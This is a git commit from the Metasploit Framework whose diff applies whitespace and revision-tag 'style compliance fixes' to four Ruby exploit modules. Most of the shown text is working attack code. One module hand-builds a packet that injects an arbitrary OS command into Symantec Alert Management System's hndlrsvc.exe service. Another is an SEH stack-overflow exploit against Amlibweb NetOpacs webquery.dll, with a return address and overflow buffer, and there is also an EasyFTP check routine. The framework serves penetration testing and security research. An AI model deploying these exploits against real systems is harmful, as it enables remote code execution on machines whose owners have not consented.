style compliance fixes

git-svn-id: file:///home/svn/framework3/trunk@9953 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-03 16:17:43 +00:00
parent f8fcc80874
commit b473cda7d9
4 changed files with 125 additions and 124 deletions

View File

@ -1,5 +1,5 @@
##
# $Id: ams_hndlrsvc.rb 9179 2010-04-30 08:40:19Z mc $
# $Id$
##
##
@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
'Description' => %q{
Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
because the application fails to properly sanitize user-supplied input.
because the application fails to properly sanitize user-supplied input.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '66807'],
@ -35,101 +35,102 @@ class Metasploit3 < Msf::Auxiliary
],
'DisclosureDate' => 'Jul 26 2010'))
register_options(
[
Opt::RPORT(38292),
OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
], self.class)
register_options(
[
Opt::RPORT(38292),
OptString.new('CMD', [ false, 'The OS command to execute',
'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
], self.class)
end
def run
begin
connect
cmd = datastore['CMD']
if ( cmd.length > 128 )
raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
end
cmd = datastore['CMD']
string_uno = Rex::Text.rand_text_alpha_upper(11)
string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
if ( cmd.length > 128 )
raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
end
packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
packet << "\xe8\x03\x00\x00"
packet << 'PRGXCNFG'
packet << "\x10\x00\x00\x00"
packet << "\x00\x00\x00\x00\x04"
packet << 'ALHD\F'
packet << "\x00\x00\x01\x00\x00"
packet << "\x00\x01\x00\x0e\x00"
packet << 'Risk Repaired'
packet << "\x00\x25\x00"
packet << 'Symantec Antivirus Corporate Edition'
packet << "\x00\xf9\x1d\x13\x4a\x3f"
packet << [string_uno.length + 1].pack('v') + string_uno
packet << "\x00\x08\x08\x0a"
packet << "\x00" + 'Risk Name'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x0a\x00"
packet << 'File Path'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x11\x00"
packet << 'Requested Action'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x0e\x00"
packet << 'Actual Action'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x07\x00"
packet << 'Logger'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x05\x00"
packet << 'User'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x09\x00"
packet << 'Hostname'
packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
packet << "\x00\x08\x13\x00"
packet << 'Corrective Actions'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x00\x07\x08\x12\x00"
packet << 'ConfigurationName'
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
packet << "\x00" + cmd
packet << "\x00\x08\x0c\x00"
packet << 'CommandLine'
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
packet << "\x00" + cmd
packet << "\x00\x08\x08\x00"
packet << 'RunArgs'
packet << "\x00\x04\x00\x02\x00"
packet << "\x20\x00\x03\x05\x00"
packet << 'Mode'
packet << "\x00\x04\x00\x02\x00\x00\x00"
packet << "\x0a\x0d\x00"
packet << 'FormatString'
packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
packet << 'ConfigurationName'
packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
packet << 'HandlerHost'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00" * packet.length
print_status("Sending command: #{datastore['CMD']}")
sock.put(packet)
disconnect
string_uno = Rex::Text.rand_text_alpha_upper(11)
string_dos = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
packet = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
packet << "\xe8\x03\x00\x00"
packet << 'PRGXCNFG'
packet << "\x10\x00\x00\x00"
packet << "\x00\x00\x00\x00\x04"
packet << 'ALHD\F'
packet << "\x00\x00\x01\x00\x00"
packet << "\x00\x01\x00\x0e\x00"
packet << 'Risk Repaired'
packet << "\x00\x25\x00"
packet << 'Symantec Antivirus Corporate Edition'
packet << "\x00\xf9\x1d\x13\x4a\x3f"
packet << [string_uno.length + 1].pack('v') + string_uno
packet << "\x00\x08\x08\x0a"
packet << "\x00" + 'Risk Name'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x0a\x00"
packet << 'File Path'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x11\x00"
packet << 'Requested Action'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x0e\x00"
packet << 'Actual Action'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x07\x00"
packet << 'Logger'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x05\x00"
packet << 'User'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x08\x09\x00"
packet << 'Hostname'
packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
packet << "\x00\x08\x13\x00"
packet << 'Corrective Actions'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00\x00\x07\x08\x12\x00"
packet << 'ConfigurationName'
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
packet << "\x00" + cmd
packet << "\x00\x08\x0c\x00"
packet << 'CommandLine'
packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
packet << "\x00" + cmd
packet << "\x00\x08\x08\x00"
packet << 'RunArgs'
packet << "\x00\x04\x00\x02\x00"
packet << "\x20\x00\x03\x05\x00"
packet << 'Mode'
packet << "\x00\x04\x00\x02\x00\x00\x00"
packet << "\x0a\x0d\x00"
packet << 'FormatString'
packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
packet << 'ConfigurationName'
packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
packet << 'HandlerHost'
packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
packet << "\x00" + string_dos
packet << "\x00" * packet.length
print_status("Sending command: #{datastore['CMD']}")
sock.put(packet)
disconnect
rescue ::Exception
print_error("Error: #{$!.class} #{$!}")
print_error("Error: #{$!.class} #{$!}")
end
end
end

View File

@ -1,5 +1,5 @@
##
# $Id: ams_xfr.rb 9179 2010-04-30 08:40:19Z jduck $
# $Id$
##
##
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9179 $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2009-1429' ],

View File

@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
credit goes to Karn Ganeshan.
NOTE: Although, this is likely to exploit the same vulnerability as the
NOTE: Although, this is likely to exploit the same vulnerability as the
'easyftp_cwd_fixret' exploit, it uses a slightly different vector.
},
'Author' =>
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (banner =~ /BigFoolCat/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit

View File

@ -20,30 +20,30 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Amlib's Amlibweb
Library Management System (NetOpacs). The webquery.dll
API is available through IIS requests. By specifying
an overly long string to the 'app' parameter, SeH can be
reliably overwritten allowing for arbitrary remote code execution.
In addition, it is possible to overwrite EIP by specifying
an arbitrary parameter name with an '=' terminator.
'Name' => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Amlib's Amlibweb
Library Management System (NetOpacs). The webquery.dll
API is available through IIS requests. By specifying
an overly long string to the 'app' parameter, SeH can be
reliably overwritten allowing for arbitrary remote code execution.
In addition, it is possible to overwrite EIP by specifying
an arbitrary parameter name with an '=' terminator.
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '66814'],
[ 'URL', 'http://www.aushack.com/advisories/' ],
],
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '66814'],
[ 'URL', 'http://www.aushack.com/advisories/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
@ -54,15 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => ['win'],
'Targets' =>
[
# patrickw - Tested OK 20100803 w2k IIS5
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
],
[
# patrickw - Tested OK 20100803 w2k IIS5
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
],
'DisclosureDate' => 'Aug 03 2010', #0day
'DefaultTarget' => 0))
register_options(
register_options(
[
Opt::RPORT(80),
],self.class)
@ -70,9 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote
def check
connect
rand = Rex::Text.rand_text_alpha(10)
sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")
res = sock.get(-1,3)
disconnect
@ -82,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
connect
seh = generate_seh_payload(target.ret)
buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"
sock.put(sploit + "\r\n\r\n")